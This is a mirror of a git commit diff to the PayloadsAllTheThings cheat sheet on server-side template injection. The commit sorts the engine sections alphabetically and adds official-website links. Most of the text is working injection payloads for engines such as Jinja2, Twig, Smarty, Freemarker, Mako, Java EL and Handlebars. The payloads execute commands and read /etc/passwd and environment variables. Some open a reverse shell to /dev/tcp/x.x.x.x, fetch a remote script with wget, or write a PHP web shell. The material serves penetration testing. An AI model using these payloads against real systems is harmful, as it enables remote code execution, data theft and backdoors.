mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-12 06:25:28 +00:00
Merge pull request #423 from p0dalirius/master
Alphabetical sort of the technologies + official websites
This commit is contained in:
commit
71988cfb40
@ -6,32 +6,21 @@
|
|||||||
|
|
||||||
* [Tools](#tools)
|
* [Tools](#tools)
|
||||||
* [Methodology](#methodology)
|
* [Methodology](#methodology)
|
||||||
* [Ruby](#ruby)
|
* [ASP.NET Razor](#aspnet-razor)
|
||||||
* [Basic injections](#ruby---basic-injections)
|
* [Basic injection](#aspnet-razor---basic-injection)
|
||||||
* [Retrieve /etc/passwd](#ruby---retrieve-etcpasswd)
|
* [Command execution](#aspnet-razor---command-execution)
|
||||||
* [List files and directories](#ruby---list-files-and-directories)
|
* [Expression Language EL](#expression-language-el)
|
||||||
|
* [Basic injection](#expression-language-el---basic-injection)
|
||||||
|
* [Code execution](#expression-language-el---code-execution)
|
||||||
|
* [Freemarker](#freemarker)
|
||||||
|
* [Basic injection](#freemarker---basic-injection)
|
||||||
|
* [Code execution](#freemarker---code-execution)
|
||||||
|
* [Handlebars](#handlebars)
|
||||||
|
* [Jade / Codepen](#jade--codepen)
|
||||||
* [Java](#java)
|
* [Java](#java)
|
||||||
* [Basic injection](#java---basic-injection)
|
* [Basic injection](#java---basic-injection)
|
||||||
* [Retrieve the system’s environment variables](#java---retrieve-the-systems-environment-variables)
|
* [Retrieve the system’s environment variables](#java---retrieve-the-systems-environment-variables)
|
||||||
* [Retrieve /etc/passwd](#java---retrieve-etcpasswd)
|
* [Retrieve /etc/passwd](#java---retrieve-etcpasswd)
|
||||||
* [Expression Language EL](#expression-language-el)
|
|
||||||
* [Basic injection](#expression-language-el---basic-injection)
|
|
||||||
* [Code execution](#expression-language-el---code-execution)
|
|
||||||
* [Twig](#twig)
|
|
||||||
* [Basic injection](#twig---basic-injection)
|
|
||||||
* [Template format](#twig---template-format)
|
|
||||||
* [Arbitrary File Reading](#twig---arbitrary-file-reading)
|
|
||||||
* [Code execution](#twig---code-execution)
|
|
||||||
* [Smarty](#smarty)
|
|
||||||
* [Freemarker](#freemarker)
|
|
||||||
* [Basic injection](#freemarker---basic-injection)
|
|
||||||
* [Code execution](#freemarker---code-execution)
|
|
||||||
* [Pebble](#pebble)
|
|
||||||
* [Basic injection](#pebble---basic-injection)
|
|
||||||
* [Code execution](#pebble---code-execution)
|
|
||||||
* [Jade / Codepen](#jade--codepen)
|
|
||||||
* [Velocity](#velocity)
|
|
||||||
* [Mako](#mako)
|
|
||||||
* [Jinja2](#jinja2)
|
* [Jinja2](#jinja2)
|
||||||
* [Basic injection](#jinja2---basic-injection)
|
* [Basic injection](#jinja2---basic-injection)
|
||||||
* [Template format](#jinja2---template-format)
|
* [Template format](#jinja2---template-format)
|
||||||
@ -45,11 +34,22 @@
|
|||||||
* [Jinjava](#jinjava)
|
* [Jinjava](#jinjava)
|
||||||
* [Basic injection](#jinjava---basic-injection)
|
* [Basic injection](#jinjava---basic-injection)
|
||||||
* [Command execution](#jinjava---command-execution)
|
* [Command execution](#jinjava---command-execution)
|
||||||
* [Handlebars](#handlebars)
|
|
||||||
* [ASP.NET Razor](#aspnet-razor)
|
|
||||||
* [Basic injection](#aspnet-razor---basic-injection)
|
|
||||||
* [Command execution](#aspnet-razor---command-execution)
|
|
||||||
* [Lessjs](#lessjs)
|
* [Lessjs](#lessjs)
|
||||||
|
* [Mako](#mako)
|
||||||
|
* [Pebble](#pebble)
|
||||||
|
* [Basic injection](#pebble---basic-injection)
|
||||||
|
* [Code execution](#pebble---code-execution)
|
||||||
|
* [Ruby](#ruby)
|
||||||
|
* [Basic injections](#ruby---basic-injections)
|
||||||
|
* [Retrieve /etc/passwd](#ruby---retrieve-etcpasswd)
|
||||||
|
* [List files and directories](#ruby---list-files-and-directories)
|
||||||
|
* [Smarty](#smarty)
|
||||||
|
* [Twig](#twig)
|
||||||
|
* [Basic injection](#twig---basic-injection)
|
||||||
|
* [Template format](#twig---template-format)
|
||||||
|
* [Arbitrary File Reading](#twig---arbitrary-file-reading)
|
||||||
|
* [Code execution](#twig---code-execution)
|
||||||
|
* [Velocity](#velocity)
|
||||||
* [References](#references)
|
* [References](#references)
|
||||||
|
|
||||||
## Tools
|
## Tools
|
||||||
@ -67,81 +67,34 @@ python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment
|
|||||||
|
|
||||||
![SSTI cheatsheet workflow](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/Images/serverside.png?raw=true)
|
![SSTI cheatsheet workflow](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/Images/serverside.png?raw=true)
|
||||||
|
|
||||||
## Ruby
|
---
|
||||||
|
|
||||||
### Ruby - Basic injections
|
## ASP.NET Razor
|
||||||
|
|
||||||
ERB:
|
[Official website](https://docs.microsoft.com/en-us/aspnet/web-pages/overview/getting-started/introducing-razor-syntax-c)
|
||||||
|
> Razor is a markup syntax that lets you embed server-based code (Visual Basic and C#) into web pages.
|
||||||
|
|
||||||
```ruby
|
### ASP.NET Razor - Basic injection
|
||||||
<%= 7 * 7 %>
|
|
||||||
```
|
|
||||||
|
|
||||||
Slim:
|
|
||||||
|
|
||||||
```ruby
|
|
||||||
#{ 7 * 7 }
|
|
||||||
```
|
|
||||||
|
|
||||||
### Ruby - Retrieve /etc/passwd
|
|
||||||
|
|
||||||
```ruby
|
|
||||||
<%= File.open('/etc/passwd').read %>
|
|
||||||
```
|
|
||||||
|
|
||||||
### Ruby - List files and directories
|
|
||||||
|
|
||||||
```ruby
|
|
||||||
<%= Dir.entries('/') %>
|
|
||||||
```
|
|
||||||
|
|
||||||
### Ruby - Code execution
|
|
||||||
|
|
||||||
Execute code using SSTI for ERB engine.
|
|
||||||
|
|
||||||
```ruby
|
|
||||||
<%= system('cat /etc/passwd') %>
|
|
||||||
<%= `ls /` %>
|
|
||||||
<%= IO.popen('ls /').readlines() %>
|
|
||||||
<% require 'open3' %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%>
|
|
||||||
<% require 'open4' %><% @a,@b,@c,@d=Open4.popen4('whoami') %><%= @c.readline()%>
|
|
||||||
```
|
|
||||||
|
|
||||||
|
|
||||||
Execute code using SSTI for Slim engine.
|
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
#{ %x|env| }
|
@(1+2)
|
||||||
```
|
```
|
||||||
|
|
||||||
## Java
|
### ASP.NET Razor - Command execution
|
||||||
|
|
||||||
### Java - Basic injection
|
```csharp
|
||||||
|
@{
|
||||||
```java
|
// C# code
|
||||||
${7*7}
|
}
|
||||||
${{7*7}}
|
|
||||||
${class.getClassLoader()}
|
|
||||||
${class.getResource("").getPath()}
|
|
||||||
${class.getResource("../../../../../index.htm").getContent()}
|
|
||||||
```
|
```
|
||||||
|
|
||||||
### Java - Retrieve the system’s environment variables
|
---
|
||||||
|
|
||||||
```java
|
|
||||||
${T(java.lang.System).getenv()}
|
|
||||||
```
|
|
||||||
|
|
||||||
### Java - Retrieve /etc/passwd
|
|
||||||
|
|
||||||
```java
|
|
||||||
${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
|
|
||||||
|
|
||||||
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
|
|
||||||
```
|
|
||||||
|
|
||||||
## Expression Language EL
|
## Expression Language EL
|
||||||
|
|
||||||
|
[Official website](https://docs.oracle.com/javaee/6/tutorial/doc/gjddd.html)
|
||||||
|
> Expression Language (EL) is mechanism that simplifies the accessibility of the data stored in Java bean component and other object like request, session and application, etc. There are many operators in JSP that are used in EL like arithmetic and logical operators to perform an expression. It was introduced in JSP 2.0
|
||||||
|
|
||||||
### Expression Language EL - Basic injection
|
### Expression Language EL - Basic injection
|
||||||
|
|
||||||
```java
|
```java
|
||||||
@ -161,7 +114,6 @@ ${"".getClass().forName("java.lang.System").getDeclaredMethod("getProperty","".g
|
|||||||
|
|
||||||
### Expression Language EL - Code Execution
|
### Expression Language EL - Code Execution
|
||||||
|
|
||||||
|
|
||||||
```java
|
```java
|
||||||
// Common RCE payloads
|
// Common RCE payloads
|
||||||
''.class.forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec(<COMMAND STRING/ARRAY>)
|
''.class.forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec(<COMMAND STRING/ARRAY>)
|
||||||
@ -190,73 +142,18 @@ ${request.getClass().forName("javax.script.ScriptEngineManager").newInstance().g
|
|||||||
${facesContext.getExternalContext().setResponseHeader("output","".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval(\"var x=new java.lang.ProcessBuilder;x.command(\\\"wget\\\",\\\"http://x.x.x.x/1.sh\\\");org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\"))}
|
${facesContext.getExternalContext().setResponseHeader("output","".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval(\"var x=new java.lang.ProcessBuilder;x.command(\\\"wget\\\",\\\"http://x.x.x.x/1.sh\\\");org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\"))}
|
||||||
```
|
```
|
||||||
|
|
||||||
|
---
|
||||||
## Twig
|
|
||||||
|
|
||||||
### Twig - Basic injection
|
|
||||||
|
|
||||||
```python
|
|
||||||
{{7*7}}
|
|
||||||
{{7*'7'}} would result in 49
|
|
||||||
{{dump(app)}}
|
|
||||||
{{app.request.server.all|join(',')}}
|
|
||||||
```
|
|
||||||
|
|
||||||
### Twig - Template format
|
|
||||||
|
|
||||||
```python
|
|
||||||
$output = $twig > render (
|
|
||||||
'Dear' . $_GET['custom_greeting'],
|
|
||||||
array("first_name" => $user.first_name)
|
|
||||||
);
|
|
||||||
|
|
||||||
$output = $twig > render (
|
|
||||||
"Dear {first_name}",
|
|
||||||
array("first_name" => $user.first_name)
|
|
||||||
);
|
|
||||||
```
|
|
||||||
|
|
||||||
### Twig - Arbitrary File Reading
|
|
||||||
|
|
||||||
```python
|
|
||||||
"{{'/etc/passwd'|file_excerpt(1,30)}}"@
|
|
||||||
```
|
|
||||||
|
|
||||||
### Twig - Code execution
|
|
||||||
|
|
||||||
```python
|
|
||||||
{{self}}
|
|
||||||
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
|
|
||||||
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
|
|
||||||
{{['id']|filter('system')}}
|
|
||||||
{{['cat\x20/etc/passwd']|filter('system')}}
|
|
||||||
{{['cat$IFS/etc/passwd']|filter('system')}}
|
|
||||||
```
|
|
||||||
|
|
||||||
Example with an email passing FILTER_VALIDATE_EMAIL PHP.
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
POST /subscribe?0=cat+/etc/passwd HTTP/1.1
|
|
||||||
email="{{app.request.query.filter(0,0,1024,{'options':'system'})}}"@attacker.tld
|
|
||||||
```
|
|
||||||
|
|
||||||
## Smarty
|
|
||||||
|
|
||||||
```python
|
|
||||||
{$smarty.version}
|
|
||||||
{php}echo `id`;{/php} //deprecated in smarty v3
|
|
||||||
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
|
|
||||||
{system('ls')} // compatible v3
|
|
||||||
{system('cat index.php')} // compatible v3
|
|
||||||
```
|
|
||||||
|
|
||||||
## Freemarker
|
## Freemarker
|
||||||
|
|
||||||
|
[Official website](https://freemarker.apache.org/)
|
||||||
|
> Apache FreeMarker™ is a template engine: a Java library to generate text output (HTML web pages, e-mails, configuration files, source code, etc.) based on templates and changing data.
|
||||||
|
|
||||||
You can try your payloads at [https://try.freemarker.apache.org](https://try.freemarker.apache.org)
|
You can try your payloads at [https://try.freemarker.apache.org](https://try.freemarker.apache.org)
|
||||||
|
|
||||||
### Freemarker - Basic injection
|
### Freemarker - Basic injection
|
||||||
|
|
||||||
The template can be `${3*3}` or the legacy `#{3*3}`
|
The template can be `${3*3}` or the legacy `#{3*3}`.
|
||||||
|
|
||||||
### Freemarker - Code execution
|
### Freemarker - Code execution
|
||||||
|
|
||||||
@ -278,37 +175,44 @@ ${"freemarker.template.utility.Execute"?new()("id")}
|
|||||||
${dwf.newInstance(ec,null)("id")}
|
${dwf.newInstance(ec,null)("id")}
|
||||||
```
|
```
|
||||||
|
|
||||||
## Pebble
|
---
|
||||||
|
|
||||||
### Pebble - Basic injection
|
## Handlebars
|
||||||
|
|
||||||
```java
|
[Official website](https://handlebarsjs.com/)
|
||||||
{{ someString.toUPPERCASE() }}
|
> Handlebars compiles templates into JavaScript functions.
|
||||||
|
|
||||||
|
### Handlebars - Command Execution
|
||||||
|
|
||||||
|
```handlebars
|
||||||
|
{{#with "s" as |string|}}
|
||||||
|
{{#with "e"}}
|
||||||
|
{{#with split as |conslist|}}
|
||||||
|
{{this.pop}}
|
||||||
|
{{this.push (lookup string.sub "constructor")}}
|
||||||
|
{{this.pop}}
|
||||||
|
{{#with string.split as |codelist|}}
|
||||||
|
{{this.pop}}
|
||||||
|
{{this.push "return require('child_process').execSync('ls -la');"}}
|
||||||
|
{{this.pop}}
|
||||||
|
{{#each conslist}}
|
||||||
|
{{#with (string.sub.apply 0 codelist)}}
|
||||||
|
{{this}}
|
||||||
|
{{/with}}
|
||||||
|
{{/each}}
|
||||||
|
{{/with}}
|
||||||
|
{{/with}}
|
||||||
|
{{/with}}
|
||||||
|
{{/with}}
|
||||||
```
|
```
|
||||||
|
|
||||||
### Pebble - Code execution
|
---
|
||||||
|
|
||||||
Old version of Pebble ( < version 3.0.9): `{{ variable.getClass().forName('java.lang.Runtime').getRuntime().exec('ls -la') }}`.
|
|
||||||
|
|
||||||
New version of Pebble :
|
|
||||||
|
|
||||||
```java
|
|
||||||
{% set cmd = 'id' %}
|
|
||||||
{% set bytes = (1).TYPE
|
|
||||||
.forName('java.lang.Runtime')
|
|
||||||
.methods[6]
|
|
||||||
.invoke(null,null)
|
|
||||||
.exec(cmd)
|
|
||||||
.inputStream
|
|
||||||
.readAllBytes() %}
|
|
||||||
{{ (1).TYPE
|
|
||||||
.forName('java.lang.String')
|
|
||||||
.constructors[0]
|
|
||||||
.newInstance(([bytes]).toArray()) }}
|
|
||||||
```
|
|
||||||
|
|
||||||
## Jade / Codepen
|
## Jade / Codepen
|
||||||
|
|
||||||
|
[Official website](https://codepen.io/)
|
||||||
|
>
|
||||||
|
|
||||||
```python
|
```python
|
||||||
- var x = root.process
|
- var x = root.process
|
||||||
- x = x.mainModule.require
|
- x = x.mainModule.require
|
||||||
@ -320,101 +224,35 @@ New version of Pebble :
|
|||||||
#{root.process.mainModule.require('child_process').spawnSync('cat', ['/etc/passwd']).stdout}
|
#{root.process.mainModule.require('child_process').spawnSync('cat', ['/etc/passwd']).stdout}
|
||||||
```
|
```
|
||||||
|
|
||||||
## Velocity
|
---
|
||||||
|
|
||||||
```python
|
## Java
|
||||||
#set($str=$class.inspect("java.lang.String").type)
|
|
||||||
#set($chr=$class.inspect("java.lang.Character").type)
|
### Java - Basic injection
|
||||||
#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("whoami"))
|
|
||||||
$ex.waitFor()
|
```java
|
||||||
#set($out=$ex.getInputStream())
|
${7*7}
|
||||||
#foreach($i in [1..$out.available()])
|
${{7*7}}
|
||||||
$str.valueOf($chr.toChars($out.read()))
|
${class.getClassLoader()}
|
||||||
#end
|
${class.getResource("").getPath()}
|
||||||
|
${class.getResource("../../../../../index.htm").getContent()}
|
||||||
```
|
```
|
||||||
|
|
||||||
## Mako
|
### Java - Retrieve the system’s environment variables
|
||||||
|
|
||||||
[Official website](https://www.makotemplates.org/)
|
```java
|
||||||
> Mako is a template library written in Python. Conceptually, Mako is an embedded Python (i.e. Python Server Page) language, which refines the familiar ideas of componentized layout and inheritance to produce one of the most straightforward and flexible models available, while also maintaining close ties to Python calling and scoping semantics.
|
${T(java.lang.System).getenv()}
|
||||||
|
|
||||||
```python
|
|
||||||
<%
|
|
||||||
import os
|
|
||||||
x=os.popen('id').read()
|
|
||||||
%>
|
|
||||||
${x}
|
|
||||||
```
|
```
|
||||||
|
|
||||||
### Direct access to os from TemplateNamespace:
|
### Java - Retrieve /etc/passwd
|
||||||
|
|
||||||
Any of these payloads allows direct access to the `os` module
|
```java
|
||||||
|
${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
|
||||||
|
|
||||||
```python
|
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
|
||||||
${self.module.cache.util.os.system("id")}
|
|
||||||
${self.module.runtime.util.os.system("id")}
|
|
||||||
${self.template.module.cache.util.os.system("id")}
|
|
||||||
${self.module.cache.compat.inspect.os.system("id")}
|
|
||||||
${self.__init__.__globals__['util'].os.system('id')}
|
|
||||||
${self.template.module.runtime.util.os.system("id")}
|
|
||||||
${self.module.filters.compat.inspect.os.system("id")}
|
|
||||||
${self.module.runtime.compat.inspect.os.system("id")}
|
|
||||||
${self.module.runtime.exceptions.util.os.system("id")}
|
|
||||||
${self.template.__init__.__globals__['os'].system('id')}
|
|
||||||
${self.module.cache.util.compat.inspect.os.system("id")}
|
|
||||||
${self.module.runtime.util.compat.inspect.os.system("id")}
|
|
||||||
${self.template._mmarker.module.cache.util.os.system("id")}
|
|
||||||
${self.template.module.cache.compat.inspect.os.system("id")}
|
|
||||||
${self.module.cache.compat.inspect.linecache.os.system("id")}
|
|
||||||
${self.template._mmarker.module.runtime.util.os.system("id")}
|
|
||||||
${self.attr._NSAttr__parent.module.cache.util.os.system("id")}
|
|
||||||
${self.template.module.filters.compat.inspect.os.system("id")}
|
|
||||||
${self.template.module.runtime.compat.inspect.os.system("id")}
|
|
||||||
${self.module.filters.compat.inspect.linecache.os.system("id")}
|
|
||||||
${self.module.runtime.compat.inspect.linecache.os.system("id")}
|
|
||||||
${self.template.module.runtime.exceptions.util.os.system("id")}
|
|
||||||
${self.attr._NSAttr__parent.module.runtime.util.os.system("id")}
|
|
||||||
${self.context._with_template.module.cache.util.os.system("id")}
|
|
||||||
${self.module.runtime.exceptions.compat.inspect.os.system("id")}
|
|
||||||
${self.template.module.cache.util.compat.inspect.os.system("id")}
|
|
||||||
${self.context._with_template.module.runtime.util.os.system("id")}
|
|
||||||
${self.module.cache.util.compat.inspect.linecache.os.system("id")}
|
|
||||||
${self.template.module.runtime.util.compat.inspect.os.system("id")}
|
|
||||||
${self.module.runtime.util.compat.inspect.linecache.os.system("id")}
|
|
||||||
${self.module.runtime.exceptions.traceback.linecache.os.system("id")}
|
|
||||||
${self.module.runtime.exceptions.util.compat.inspect.os.system("id")}
|
|
||||||
${self.template._mmarker.module.cache.compat.inspect.os.system("id")}
|
|
||||||
${self.template.module.cache.compat.inspect.linecache.os.system("id")}
|
|
||||||
${self.attr._NSAttr__parent.template.module.cache.util.os.system("id")}
|
|
||||||
${self.template._mmarker.module.filters.compat.inspect.os.system("id")}
|
|
||||||
${self.template._mmarker.module.runtime.compat.inspect.os.system("id")}
|
|
||||||
${self.attr._NSAttr__parent.module.cache.compat.inspect.os.system("id")}
|
|
||||||
${self.template._mmarker.module.runtime.exceptions.util.os.system("id")}
|
|
||||||
${self.template.module.filters.compat.inspect.linecache.os.system("id")}
|
|
||||||
${self.template.module.runtime.compat.inspect.linecache.os.system("id")}
|
|
||||||
${self.attr._NSAttr__parent.template.module.runtime.util.os.system("id")}
|
|
||||||
${self.context._with_template._mmarker.module.cache.util.os.system("id")}
|
|
||||||
${self.template.module.runtime.exceptions.compat.inspect.os.system("id")}
|
|
||||||
${self.attr._NSAttr__parent.module.filters.compat.inspect.os.system("id")}
|
|
||||||
${self.attr._NSAttr__parent.module.runtime.compat.inspect.os.system("id")}
|
|
||||||
${self.context._with_template.module.cache.compat.inspect.os.system("id")}
|
|
||||||
${self.module.runtime.exceptions.compat.inspect.linecache.os.system("id")}
|
|
||||||
${self.attr._NSAttr__parent.module.runtime.exceptions.util.os.system("id")}
|
|
||||||
${self.context._with_template._mmarker.module.runtime.util.os.system("id")}
|
|
||||||
${self.context._with_template.module.filters.compat.inspect.os.system("id")}
|
|
||||||
${self.context._with_template.module.runtime.compat.inspect.os.system("id")}
|
|
||||||
${self.context._with_template.module.runtime.exceptions.util.os.system("id")}
|
|
||||||
${self.template.module.runtime.exceptions.traceback.linecache.os.system("id")}
|
|
||||||
```
|
```
|
||||||
|
|
||||||
PoC :
|
---
|
||||||
|
|
||||||
```python
|
|
||||||
>>> print(Template("${self.module.cache.util.os}").render())
|
|
||||||
<module 'os' from '/usr/local/lib/python3.10/os.py'>
|
|
||||||
```
|
|
||||||
|
|
||||||
Source [@podalirius_](https://twitter.com/podalirius_) : [https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/](https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/)
|
|
||||||
|
|
||||||
## Jinja2
|
## Jinja2
|
||||||
|
|
||||||
@ -556,7 +394,6 @@ In another GET parameter include a variable named "input" that contains the comm
|
|||||||
{{ config['RUNCMD']('/bin/bash -c "/bin/bash -i >& /dev/tcp/x.x.x.x/8000 0>&1"',shell=True) }}
|
{{ config['RUNCMD']('/bin/bash -c "/bin/bash -i >& /dev/tcp/x.x.x.x/8000 0>&1"',shell=True) }}
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
### Jinja2 - Filter bypass
|
### Jinja2 - Filter bypass
|
||||||
|
|
||||||
```python
|
```python
|
||||||
@ -595,8 +432,13 @@ Bypassing most common filters ('.','_','|join','[',']','mro' and 'base') by http
|
|||||||
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}
|
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}
|
||||||
```
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
## Jinjava
|
## Jinjava
|
||||||
|
|
||||||
|
[Official website](https://github.com/HubSpot/jinjava)
|
||||||
|
> Java-based template engine based on django template syntax, adapted to render jinja templates (at least the subset of jinja in use in HubSpot content).
|
||||||
|
|
||||||
### Jinjava - Basic injection
|
### Jinjava - Basic injection
|
||||||
|
|
||||||
```python
|
```python
|
||||||
@ -617,54 +459,16 @@ Fixed by https://github.com/HubSpot/jinjava/pull/230
|
|||||||
|
|
||||||
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
|
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
|
||||||
|
|
||||||
|
|
||||||
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
|
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
|
||||||
```
|
```
|
||||||
|
|
||||||
## Handlebars
|
---
|
||||||
|
|
||||||
### Handlebars - Command Execution
|
|
||||||
|
|
||||||
```handlebars
|
|
||||||
{{#with "s" as |string|}}
|
|
||||||
{{#with "e"}}
|
|
||||||
{{#with split as |conslist|}}
|
|
||||||
{{this.pop}}
|
|
||||||
{{this.push (lookup string.sub "constructor")}}
|
|
||||||
{{this.pop}}
|
|
||||||
{{#with string.split as |codelist|}}
|
|
||||||
{{this.pop}}
|
|
||||||
{{this.push "return require('child_process').execSync('ls -la');"}}
|
|
||||||
{{this.pop}}
|
|
||||||
{{#each conslist}}
|
|
||||||
{{#with (string.sub.apply 0 codelist)}}
|
|
||||||
{{this}}
|
|
||||||
{{/with}}
|
|
||||||
{{/each}}
|
|
||||||
{{/with}}
|
|
||||||
{{/with}}
|
|
||||||
{{/with}}
|
|
||||||
{{/with}}
|
|
||||||
```
|
|
||||||
|
|
||||||
## ASP.NET Razor
|
|
||||||
|
|
||||||
### ASP.NET Razor - Basic injection
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
@(1+2)
|
|
||||||
```
|
|
||||||
|
|
||||||
### ASP.NET Razor - Command execution
|
|
||||||
|
|
||||||
```csharp
|
|
||||||
@{
|
|
||||||
// C# code
|
|
||||||
}
|
|
||||||
```
|
|
||||||
|
|
||||||
## Lessjs
|
## Lessjs
|
||||||
|
|
||||||
|
[Official website](https://lesscss.org/)
|
||||||
|
> Less (which stands for Leaner Style Sheets) is a backwards-compatible language extension for CSS. This is the official documentation for Less, the language and Less.js, the JavaScript tool that converts your Less styles to CSS styles.
|
||||||
|
|
||||||
### Lessjs - SSRF / LFI
|
### Lessjs - SSRF / LFI
|
||||||
|
|
||||||
```less
|
```less
|
||||||
@ -715,6 +519,263 @@ registerPlugin({
|
|||||||
})
|
})
|
||||||
```
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Mako
|
||||||
|
|
||||||
|
[Official website](https://www.makotemplates.org/)
|
||||||
|
> Mako is a template library written in Python. Conceptually, Mako is an embedded Python (i.e. Python Server Page) language, which refines the familiar ideas of componentized layout and inheritance to produce one of the most straightforward and flexible models available, while also maintaining close ties to Python calling and scoping semantics.
|
||||||
|
|
||||||
|
```python
|
||||||
|
<%
|
||||||
|
import os
|
||||||
|
x=os.popen('id').read()
|
||||||
|
%>
|
||||||
|
${x}
|
||||||
|
```
|
||||||
|
|
||||||
|
### Direct access to os from TemplateNamespace:
|
||||||
|
|
||||||
|
Any of these payloads allows direct access to the `os` module
|
||||||
|
|
||||||
|
```python
|
||||||
|
${self.module.cache.util.os.system("id")}
|
||||||
|
${self.module.runtime.util.os.system("id")}
|
||||||
|
${self.template.module.cache.util.os.system("id")}
|
||||||
|
${self.module.cache.compat.inspect.os.system("id")}
|
||||||
|
${self.__init__.__globals__['util'].os.system('id')}
|
||||||
|
${self.template.module.runtime.util.os.system("id")}
|
||||||
|
${self.module.filters.compat.inspect.os.system("id")}
|
||||||
|
${self.module.runtime.compat.inspect.os.system("id")}
|
||||||
|
${self.module.runtime.exceptions.util.os.system("id")}
|
||||||
|
${self.template.__init__.__globals__['os'].system('id')}
|
||||||
|
${self.module.cache.util.compat.inspect.os.system("id")}
|
||||||
|
${self.module.runtime.util.compat.inspect.os.system("id")}
|
||||||
|
${self.template._mmarker.module.cache.util.os.system("id")}
|
||||||
|
${self.template.module.cache.compat.inspect.os.system("id")}
|
||||||
|
${self.module.cache.compat.inspect.linecache.os.system("id")}
|
||||||
|
${self.template._mmarker.module.runtime.util.os.system("id")}
|
||||||
|
${self.attr._NSAttr__parent.module.cache.util.os.system("id")}
|
||||||
|
${self.template.module.filters.compat.inspect.os.system("id")}
|
||||||
|
${self.template.module.runtime.compat.inspect.os.system("id")}
|
||||||
|
${self.module.filters.compat.inspect.linecache.os.system("id")}
|
||||||
|
${self.module.runtime.compat.inspect.linecache.os.system("id")}
|
||||||
|
${self.template.module.runtime.exceptions.util.os.system("id")}
|
||||||
|
${self.attr._NSAttr__parent.module.runtime.util.os.system("id")}
|
||||||
|
${self.context._with_template.module.cache.util.os.system("id")}
|
||||||
|
${self.module.runtime.exceptions.compat.inspect.os.system("id")}
|
||||||
|
${self.template.module.cache.util.compat.inspect.os.system("id")}
|
||||||
|
${self.context._with_template.module.runtime.util.os.system("id")}
|
||||||
|
${self.module.cache.util.compat.inspect.linecache.os.system("id")}
|
||||||
|
${self.template.module.runtime.util.compat.inspect.os.system("id")}
|
||||||
|
${self.module.runtime.util.compat.inspect.linecache.os.system("id")}
|
||||||
|
${self.module.runtime.exceptions.traceback.linecache.os.system("id")}
|
||||||
|
